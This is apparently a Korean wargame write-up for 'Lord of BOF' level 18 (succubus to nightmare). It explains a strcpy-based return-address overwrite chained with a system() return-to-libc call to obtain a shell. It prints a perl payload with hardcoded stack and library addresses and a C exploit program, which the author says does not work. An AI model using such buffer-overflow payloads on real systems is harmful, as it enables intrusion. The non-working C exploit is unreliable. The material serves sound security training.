[BOF 원정대] succubus-> nightmare (level 18)

ret에 무조건 strcpy()의 주소를 적어야만 프로그램 진행이 된다.

따라서 위 함수를 이용하여 bof를 하면 되는데, strcpy함수의 경우 8바이트 뒤의 4바이트를 dest, 12바이트 뒤의 4바이트를 src로 인식한다.

그러므로, dest 위치에는 ret 주소를 적고 src 위치에는 buf의 시작 주소를 적고 buf에는 system함수를 이용한 RTL을 이용하여 쉘을 얻을 수 있다.

공격 코드

./nightmare `perl -e 'print "\xe0\x8a\x05\x40\xe0\x91\x03\x40\xf9\xbf\x0f\x40", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xf0\xfa\xff\xbf", "\xc0\xfa\xff\xbf"'`

exploit

/* Load of BOF Level 18 Exploit 2014. 08. 02 written by ab2rz1 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define NOP 0x90 #define BUFSIZE 60 #define DUMMY 32 char system_rtl[] = "\xe0\x8a\x05\x40\xe0\x91\x03\x40\xf9\xbf\x0f\x40"; char strcpy_addr[] = "\x10\x84\x04\x08"; char ret_addr[] = "\xf0\xfa\xff\xbf"; char buf_addr[] = "\xc0\xfa\xff\xbf"; int main() { char buf[BUFSIZE]; char cmd[150]; int i, j; int system_rtl_len; int strcpy_addr_len; int ret_addr_len; int buf_addr_len; system_rtl_len = strlen(system_rtl); strcpy_addr_len = strlen(strcpy_addr); ret_addr_len = strlen(ret_addr); buf_addr_len = strlen(buf_addr); for (i = 0; i < system_rtl_len; i++) buf[i] = system_rtl[i]; for (j = 0; j < DUMMY; j++) buf[i++] = NOP; for (j = 0; j < strcpy_addr_len + 4; j++) buf[i++] = strcpy_addr[j % 4]; for (j = 0; j < ret_addr_len; j++) buf[i++] = ret_addr[j]; for (j = 0; j < buf_addr_len; j++) buf[i++] = buf_addr[j]; sprintf(cmd, "./nightmare \"`perl -e \'print \""); strcat(cmd, buf); strcat(cmd, "\"\'`\""); printf("%s\n", cmd); system(cmd); }

공격코드를 직접 입력해주면 쉘이 떨어지는데 exploit은 동작을 안한다...... 혹시 아는분은 댓글 부탁드립니다.